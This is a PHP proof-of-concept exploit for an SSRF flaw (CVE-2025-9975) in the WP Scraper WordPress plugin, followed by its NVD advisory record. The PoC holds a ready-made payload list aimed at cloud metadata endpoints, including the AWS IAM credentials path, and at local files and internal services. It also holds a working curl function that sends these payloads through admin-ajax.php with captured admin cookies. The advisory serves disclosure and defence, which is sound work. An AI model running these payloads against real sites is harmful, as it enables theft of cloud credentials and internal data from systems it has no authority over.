CVE-2025-9975

<?php /** * CVE-2025-9975 - WP Scraper SSRF PoC * * This PoC demonstrates how an authenticated administrator * can exploit the wp_scraper_extract_content function to perform SSRF attacks. * * Usage: * 1. Obtain WordPress admin credentials * 2. Login to wp-admin * 3. Navigate to WP Scraper settings * 4. Set the target URL to the malicious payload * 5. Trigger content extraction */ // Example malicious URL payloads for SSRF exploitation: $payloads = array( // AWS EC2 metadata service - retrieve IAM credentials 'http://169.254.169.254/latest/meta-data/iam/security-credentials/', // AWS EC2 metadata - retrieve instance info 'http://169.254.169.254/latest/meta-data/', // Google Cloud metadata service 'http://169.254.169.254/computeMetadata/v1/', // Azure metadata service 'http://169.254.169.254/metadata/instance?api-version=2021-02-01', // Internal network scan 'http://127.0.0.1:8080/admin', // Local file read (if file:// protocol is allowed) 'file:///etc/passwd', // Internal service access 'http://internal-service.local/api/v1/users' ); // Simulated exploitation via WordPress admin-ajax.php function exploit_ssrf($target_url, $cookie_file) { $ch = curl_init(); // WordPress admin-ajax endpoint $url = 'http://target-wordpress-site.com/wp-admin/admin-ajax.php'; $post_data = array( 'action' => 'wp_scraper_extract', 'url' => $target_url ); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); return $response; } // Example usage: // $result = exploit_ssrf($payloads[0], 'admin_cookies.txt'); // echo $result; ?>

{"cve": {"id": "CVE-2025-9975", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:45.280", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Scraper plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.8.1 via the wp_scraper_extract_content function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On Cloud instances, this issue allows for metadata retrieving."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-scraper/tags/5.8.1/wp-scraper.php#L688", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396219%40wp-scraper&new=3396219%40wp-scraper&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4c72abf9-f63d-4460-8c9b-10e3f65b71ba?source=cve", "source": "[email protected]"}]}}